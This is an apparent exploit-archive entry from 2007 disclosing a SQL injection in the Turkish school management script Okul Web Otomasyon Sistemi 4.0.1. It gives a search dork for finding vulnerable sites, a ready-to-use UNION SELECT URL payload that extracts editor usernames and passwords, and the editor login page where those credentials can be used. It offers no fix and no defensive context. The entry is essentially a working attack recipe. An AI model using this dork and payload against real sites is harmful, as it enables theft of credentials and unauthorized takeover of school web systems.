Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability
# Published : 2007-01-15
# Author : ilker Kandemir
# Previous Title : KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit
# Next Title : ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...

 
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
 
DORK: inurl:etkinlikbak.asp
-------------------------------------------------------------------------------------------------------------------
Exploit:  etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
-------------------------------------------------------------------------------------------------------------------
Editor Panel: editor_gir.asp
-------------------------------------------------------------------------------------------------------------------
 
Tnx:H0tturk,Dr.Max Virus,,PcDelisi,CodeR,Dumenci
Special Tnx:Asianeagle, AYYILDIZ.ORG

# www.Syue.com [2007-01-15]